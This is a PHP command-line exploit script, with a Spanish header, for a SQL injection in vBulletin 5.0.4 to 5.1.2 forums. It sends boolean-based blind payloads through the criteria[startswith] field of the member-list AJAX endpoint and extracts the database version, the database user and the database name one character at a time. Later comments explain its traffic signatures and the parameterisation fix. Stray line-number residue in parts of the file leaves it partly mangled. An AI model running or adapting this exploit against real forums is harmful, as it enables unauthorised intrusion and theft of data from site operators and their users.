1 | <?php | |
2 | ||
3 | /* | |
4 | Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video) | |
5 | http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html | |
6 | Author: Nytro | |
7 | Powered by: Romanian Security Team | |
8 | Price: Free. Educational. | |
9 | */ | |
10 | ||
11 | ||
// Show every notice and warning on stdout: the script is a CLI tool whose
// output is the page text it parses, so parse failures should be visible.
error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments
//
// $argv[1] is the forum base URL (no trailing slash).  It is used verbatim,
// without validation, to build every request URL below; when it is missing
// a hard-coded default site is used instead.  $argv is only populated when
// PHP runs from the command line.


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
// The same URL with '/' escaped as '\/' — presumably the form it takes inside
// the JSON-escaped HTML fragment the endpoint returns (it is only used as an
// explode() needle further down; confirm against a real response).
$expression = str_replace('/', '\\/', $target_url);
21 | ||
22 | ||
23 | // Function to send a POST request | |
24 | ||
25 | ||
// Send one HTTP POST to $url with the raw, pre-encoded body $params and
// return the response body (headers excluded) as a string.
// On transport failure the curl error text is printed and false is returned.
function httpPost($url,$params)
{
    $ch = curl_init($url);


    // CURLOPT_URL repeats the URL already handed to curl_init(); harmless.
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    // NOTE(review): certificate verification is switched off, so the TLS
    // session can be intercepted by an on-path party; everything sent here
    // (including the static cookie below) is exposed to such a party.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    // $params is a string and is sent as-is; the caller is responsible for
    // its encoding.
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    // Fixed request headers.  User-Agent, Accept, X-Requested-With, the
    // Referer (which points at one fixed site regardless of $url) and the
    // constant bb_lastvisit/bb_lastactivity cookie are identical on every
    // request this script makes, so its traffic is easy to fingerprint in
    // web-server logs.
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));


    $output = curl_exec($ch);

    // Loose comparison: a successful but empty body ("") also satisfies
    // == FALSE and prints an (empty) error string.  htmlspecialchars() adds
    // nothing for CLI output.
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}
56 | ||
57 | ||
58 | // Function to get string between two other strings | |
59 | ||
60 | ||
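// Return the part of $string between the first occurrence of $start and the
// first occurrence of $end that follows it.
//
// Returns "" when $start is absent, and also when $end does not occur after
// $start (a missing $end used to yield a negative substr() length and thus an
// arbitrary tail of the input).  A single space is prepended so that a match
// at offset 0 of the caller's string lands at offset 1; an offset of 0, or
// false, is then unambiguously "not found".
function get_string_between($string, $start, $end)
{
    $haystack = ' ' . $string;
    $startAt = strpos($haystack, $start);
    if ($startAt === false || $startAt === 0) {
        return '';
    }
    $from = $startAt + strlen($start);
    $endAt = strpos($haystack, $end, $from);
    if ($endAt === false) {
        return '';
    }
    return substr($haystack, $from, $endAt - $from);
}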
70 | ||
71 | ||
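// Get version
//
// Boolean-based blind extraction, one character per request.  Each POST to
// /ajax/render/memberlist_items carries, in criteria[startswith], a
// comparison between the first letter of user.username and one character of
// version().  If the response lacks the 'No Users Matched Your Query' marker,
// some username matched and its first letter (the recovered character) is
// printed; otherwise the loop stops.
//
// Defender notes: the request is distinguishable from normal member-list
// use — criteria[startswith] containing `"+OR+SUBSTR(`, securitytoken=guest,
// and a burst of near-identical POSTs to this endpoint, one per character.
// The root cause is unparameterised use of the startswith value in the
// member-list query; the fix is to bind it as a parameter / apply the vendor
// patch for the versions listed in the file header.
//
// Fixed here: the banner said "vBulltin".


print "\r\nRomanian Security Team - vBulletin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


// Position inside version() requested next; the first request above used 1.
$letter = 1;


// Loose comparison: the marker at offset 0 would also read as "absent"
// (unlikely, as the fragment starts with markup).
while(strpos($result, 'No Users Matched Your Query') == false)
{
    // Split on the member-link prefix of the JSON-escaped fragment; element 1
    // starts right after the first member link.  If the needle is missing,
    // $exploded[1] is undefined and the next line warns.
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    // First letter of the first matched username == the recovered character.
    // $username[0] on an empty string emits a warning on PHP 8.
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}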
100 | ||
101 | ||
// Get user
//
// Same one-character-per-request loop as the version step, now comparing the
// first letter of user.username against successive characters of user()
// (presumably the database account the forum connects with).  Recovered
// characters are echoed as they arrive; the loop ends when the response
// carries the 'No Users Matched Your Query' marker.
//
// Defender notes: each character costs one POST to
// /ajax/render/memberlist_items whose criteria[startswith] contains SQL
// (`"+OR+SUBSTR(`) and whose securitytoken is the literal `guest`; the
// mitigation is to parameterise the startswith value in the member-list
// query.


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


// Position inside user() requested next; the first request above used 1.
$letter = 1;


// Loose comparison with false: a marker at offset 0 would also count as absent.
while(strpos($result, 'No Users Matched Your Query') == false)
{
    // Element 1 begins just after the first member link of the JSON-escaped
    // fragment; undefined (warning) if the needle does not occur.
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    // First letter of the first matched username == the recovered character.
    // $username[0] on "" emits a warning on PHP 8.
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
130 | ||
131 | ||
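// Get database
//
// Same one-character-per-request loop as the earlier steps, now comparing the
// first letter of user.username against successive characters of database().
// Recovered characters are echoed as they arrive; the loop ends when the
// response carries the 'No Users Matched Your Query' marker.
//
// Defender notes: each character costs one POST to
// /ajax/render/memberlist_items whose criteria[startswith] contains SQL
// (`"+OR+SUBSTR(`) and whose securitytoken is the literal `guest`; the
// mitigation is to parameterise the startswith value in the member-list
// query.
//
// Fixed here: the output label said "Databse".


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


// Position inside database() requested next; the first request above used 1.
$letter = 1;


// Loose comparison with false: a marker at offset 0 would also count as absent.
while(strpos($result, 'No Users Matched Your Query') == false)
{
    // Element 1 begins just after the first member link of the JSON-escaped
    // fragment; undefined (warning) if the needle does not occur.
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    // First letter of the first matched username == the recovered character.
    // $username[0] on "" emits a warning on PHP 8.
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}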
160 | ||
161 | ||
// Terminate the last output line.
echo "\r\n";
163 | ||
164 | ||
165 | ?> |